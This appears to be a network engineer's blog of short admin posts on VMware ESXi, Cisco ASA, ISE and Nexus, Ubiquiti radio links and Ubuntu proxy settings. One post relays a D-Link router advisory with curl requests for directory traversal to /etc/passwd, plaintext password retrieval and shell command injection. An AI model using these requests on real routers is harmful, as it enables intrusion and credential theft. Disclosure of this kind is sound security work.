The Insecure Wire

a network engineer's perspective

VMware ESXi Setting iphash load balancing via CLI

I recently set up two new ESXi 6.7 U1 servers without access to each host's LAN. I needed to configure the correct vSwitch failover setting so that the port-channel uplinks would work correctly:

1. Enable the SSH console from Management Settings > Troubleshooting Options on the ESXi console.
2. Bring up the CLI console with Alt + F1.
3. Enter the following commands to set the vSwitch and Management portgroup failover policy:

esxcli network vswitch standard policy failover set -v vSwitch0 -l iphash
esxcli network vswitch standard portgroup policy failover set -l iphash -p 'Management Network'

4. Alt + F2 will switch you back to the VMware DCUI console.
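Without GUI access it is worth confirming the change took; the matching esxcli get commands should report iphash as the active load-balancing policy (same vSwitch and portgroup names as above):

```
esxcli network vswitch standard policy failover get -v vSwitch0
esxcli network vswitch standard portgroup policy failover get -p 'Management Network'
```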

Cisco ASA Dynamically open MS-RPC Ports

OK, so this one is simple once you know how. TCP port 135 (the MS-RPC Endpoint Mapper) negotiates dynamic high-range ports (> 1024) for Windows client/server networking. To allow this traffic across the ASA you need to pinhole the ports with the global policy map:

class-map dcerpc
 match port tcp eq 135

policy-map type inspect dcerpc dcerpc_map
 parameters
  timeout pinhole 0:10:00

policy-map global_policy
 class dcerpc
  inspect dcerpc dcerpc_map

You also need to permit the traffic through the firewall rules (obviously). That can be done with tcp/135 or an IP any rule between the hosts. Use the command:
show run policy-map to verify the policy map.
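As a sketch of the accompanying access rule, assuming a hypothetical internal RPC server at 10.0.0.5 and an ACL named OUTSIDE_IN applied inbound on the outside interface:

```
access-list OUTSIDE_IN extended permit tcp any host 10.0.0.5 eq 135
access-group OUTSIDE_IN in interface outside
```

The dcerpc inspection then opens the negotiated high ports dynamically, so only port 135 needs a static permit.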

Cisco ASA show CLI passwords

What’s the command so that you can see hashed passwords on the Cisco ASA CLI?

ciscoasa(config)# more system:running-config

Very handy for when you need to copy passwords from one device to another.

Cisco ISE Unable to load Context Visibility page. Ensure that reverse DNS lookup is configured for all Cisco ISE nodes in your distributed deployment in the DNS server(s)

What a mouthful! So I was changing roles and deployment on our Cisco ISE back end yesterday when I ran into an interesting visual error on the primary administration node:


Turns out the reverse lookup in your DNS server has to match the hostname (A record) of the ISE node(s). My issue was that I had the ISE names in two zones, and the Elasticsearch component of ISE was picking up the non-primary zone during a reverse DNS lookup. I removed those records, the error disappeared, and the correct data showed in the Work Center view.

The command I used to troubleshoot from the primary administration node shell was:

show logging application ise-elasticsearch.log

The dead giveaway was in the log file:

[2018-11-14 01:00:12,976][INFO ][discovery.zen ] [ibra] failed to send join request to master [{ithaca}{ROGHmWtxSv6JWzhjW3maeQ}{}{}], reason [NodeDisconnectedException[[
ithaca][][internal:discovery/zen/join] disconnected]]
[2018-11-14 01:00:16,077][WARN ][plugin.ssl.transport ] [ibra] exception caught on transport layer [[id: 0x7ce0f56d, / =>]], closing connection
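The underlying invariant is simple: for every ISE node, the PTR record for its IP must resolve back to the same name as its A record. A minimal sketch of that check in Python (hostnames, IPs, and zones below are hypothetical; a live check would query DNS, e.g. via socket.gethostbyaddr):

```python
def find_ptr_mismatches(a_records, ptr_records):
    """Return (hostname, ip, ptr) tuples where the reverse
    lookup does not match the forward A record."""
    mismatches = []
    for host, ip in a_records.items():
        ptr = ptr_records.get(ip)
        if ptr != host:
            mismatches.append((host, ip, ptr))
    return mismatches

# Hypothetical deployment: the second node's PTR points at the wrong zone.
a_records = {
    "ise1.corp.example": "10.1.1.10",
    "ise2.corp.example": "10.1.1.11",
}
ptr_records = {
    "10.1.1.10": "ise1.corp.example",
    "10.1.1.11": "ise2.other.example",  # stale record in the non-primary zone
}
print(find_ptr_mismatches(a_records, ptr_records))
```

Any tuple in the output points at a PTR record to delete or correct, which is exactly what cleared the Context Visibility error above.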

Using Ubiquiti AirMax with Cisco dot1q Trunking

We recently encountered an issue wherein a particular training building required network access. It was actually a shed used to teach carpentry, bricklaying, and so on.
As this building had never had fiber optic or conduit connected to it, a cost-effective solution was sought.

I decided to use the Ubiquiti Networks AirMAX Prism 2 product. With it I was able to create a "virtual wire" from the existing Cisco Catalyst based campus network to the shed.
The really cool thing about UBNT gear is that it supports enterprise standards, in this case dot1q trunking and layer 2 protocols like CDP. Our link is only around 25 meters in distance, so speed was not really going to be a problem, as the Prism 2 is 802.11ac capable at 20/40/80 MHz channel widths. I was more interested in the stability of the link than speed. Granted, we were able to achieve 300 Mbit/s, which is a good result for the staff and students working in this area.

Let's break down the components I used:
2 x UBNT AirMAX Prism 2 AC radios – both come with GPS for plotting distance. Note these come with PoE injectors.
2 x Ubiquiti 5 GHz AC RocketDish, 31 dBi (compatible with Prism 2 radios).
1 x 8-port PoE managed Ethernet switch.
1 x Cisco 3702i AC wireless AP.

As the shed never had any data cabling, we decided to install our enterprise Cisco AP to provide network access to the building. This is why I didn't bother with a 48-port Catalyst switch; a cheap PoE switch will do the trick. The Prism AC configuration is AP mode for the main side and station mode for the shed side, which allows pass-through of VLAN tags for dot1q trunking. The Cisco AP on the far end needs a specific native VLAN as it is running in FlexConnect mode. The managed switch supports dot1q and powers the Cisco AP out of the box without an injector, and you can also tag your in-band management VLAN for the switch's management IP address.

So for under 3k including cabling and mounting costs, we were able to extend the network to this location. Below are the Catalyst commands for the uplink to the Prism 2 in AP mode:
description Link to Radio Bridge
switchport trunk allowed vlan 2,3,4,10,111
switchport trunk encapsulation dot1q
switchport trunk native vlan 111
switchport mode trunk
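The shed-side PoE switch port facing the station radio carries the same trunk. A sketch with a hypothetical interface number, in Cisco-style syntax (the exact CLI depends on the managed switch you choose):

```
interface GigabitEthernet0/1
 description Link to shed radio (station)
 switchport trunk allowed vlan 2,3,4,10,111
 switchport trunk native vlan 111
 switchport mode trunk
```

Keeping the allowed VLAN list and native VLAN identical on both ends of the virtual wire is what makes the radio link behave like a plain dot1q trunk cable.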

A cool feature of the AirMAX OS for Prism is the Google Maps integration if you mount the included GPS antenna on each end of the link. Below is a screenshot of the web interface showing this mode:


UBNT AirOS GPS Feature

Multiple vulnerabilities in D-Link Routers

Released on Friday 12/10/18:

Multiple vulnerabilities in D-Link routers

Directory traversal in the httpd server in several series of D-Link routers:
$ curl http://routerip/uir//etc/passwd
Password stored in plaintext in several series of D-Link routers:
$ curl http://routerip/uir//tmp/XXX/0
Shell command injection in the httpd server of several series of D-Link routers:
$ curl http://routerip/chkisg.htm%3FSip%3D1.1.1.1%20%7C%20cat%20

Cannot extend datastore through vCenter Server

Today on the random VMware "feature" list: extending a datastore. On the EMC SAN side the LUN was increased, and the vSphere Client (vCenter) could see the extended drive. However, you could not extend the datastore via the wizard.

Very interesting – a quick google yielded:
Cannot extend datastore through vCenter Server
So basically vCenter applies a filter when pulling available extents, based on these criteria:

1. LUNs are not used as datastores on that host or on any other host.
2. LUNs are not used as Raw Device Mappings on that host or any other host.

Solution – connect directly to the host that has the LUN and add the extent with the extend datastore wizard.

Adding a system-wide proxy to Ubuntu 18.04 Server

Here’s how to do it:

Log into the CLI of your Ubuntu 18.04 server and open /etc/environment as root:

sudo nano /etc/environment

Now add in your proxy variables in the following format:
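The proxy hostname and port below are placeholders; substitute your own. A typical /etc/environment proxy block looks like this:

```
http_proxy="http://proxy.example.com:3128/"
https_proxy="http://proxy.example.com:3128/"
ftp_proxy="http://proxy.example.com:3128/"
no_proxy="localhost,127.0.0.1"
```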


Disconnect from the CLI and log in again for /etc/environment to take effect.

Cisco ISE Invalid MAC Address

If the incorrect format is used to import a MAC address into Cisco ISE, you can't delete it from the Endpoint Identity Groups screen (Administration > Groups > Endpoint Identity Groups). The error is as follows:

Cisco ISE Invalid MAC

To work around this, remove the incorrectly formatted MAC address from:

Work Centers > Network Access > Identities. Use the search box and trash icon to clear the MAC.

Multihoming Cisco 2K FEX with 5K Fabric

Recently we moved our data centre, which is a Cisco UCS and Nexus fabric design. After a very long day moving gear and reconnecting it all back up, we couldn't understand why one of our FEXs kept flapping from the 5K fabric. The 5K fabric is multi-homed to 2 FEX switches, each in its own virtual port channel. We researched the issue and found that if you're multi-homing to more than one FEX switch, you need to make sure the physical interface IDs on the 5Ks marry up.

For example:

5K-1 Port e1/29 (vpc101) -> 2K-1 Uplink Port 1
5K-2 Port e1/29 (vpc101) -> 2K-1 Uplink Port 2
5K-1 Port e1/30 (vpc102) -> 2K-2 Uplink Port 1
5K-2 Port e1/30 (vpc102) -> 2K-2 Uplink Port 2

As you can see above, the 5K side uses the same port number on each 5K connecting to a given FEX. This fixed the flapping issue and the ownership console error. Good times ensued and we could patch all our physical copper rack servers.
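As a sketch of the fabric-side configuration, assuming FEX 101 dual-homed on port e1/29 of both 5Ks (the FEX, vPC, and port-channel numbers here are hypothetical); the same block goes on each 5K:

```
interface Ethernet1/29
  description Uplink to FEX 101
  switchport mode fex-fabric
  fex associate 101
  channel-group 101

interface port-channel101
  switchport mode fex-fabric
  fex associate 101
  vpc 101
```

With matching port-channel and vpc numbers on both 5Ks, each FEX sees one consistent dual-homed fabric uplink instead of flapping between owners.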